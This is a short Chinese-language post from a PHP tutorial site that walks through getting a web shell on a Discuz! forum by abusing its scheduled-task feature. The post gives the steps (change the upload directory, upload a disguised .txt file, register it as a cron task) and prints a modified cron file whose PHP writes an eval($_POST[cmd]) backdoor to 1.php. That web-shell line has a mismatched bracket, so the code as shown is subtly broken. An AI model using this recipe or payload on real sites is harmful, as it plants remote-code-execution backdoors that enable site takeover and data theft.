来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 由于计划任务功能没有对文件名做任何限制导致只需要把文件上传到/include/crons/目录就可以执行首先到全局附件设置修改上传目录然后直接拿他本身存在的计划任务件/include/crons/announc...
由于计划任务功能没有对文件名做任何限制导致只需要把文件上传到/include/crons/目录就可以执行 首先到全局附件设置修改上传目录
然后直接拿他本身存在的计划任务件 /include/crons/announcements_daily.inc.php修改内容为
<?php
/*
[Discuz!] (C)2001-2009 Comsenz Inc.
This is NOT a freeware, use is subject to license terms
$Id: announcements_daily.inc.php 17476 2008-12-25 02:58:18Z liuqiang $
*/
if(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
fputs(fopen('1.php','w'),'<?php eval($_POST[cmd)?>\r\n');
?>
我是保存的11.txt,到论坛任意可以上传文件的板块发表新帖上传 
到后台在附件管理可以获得上传的路径和文件名 
我这里显示的是1307312134da261a93f37e3656.txt,记住这个文件名 把他写到计划任务里 
提交后点执行1.php就在根目录生成了 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
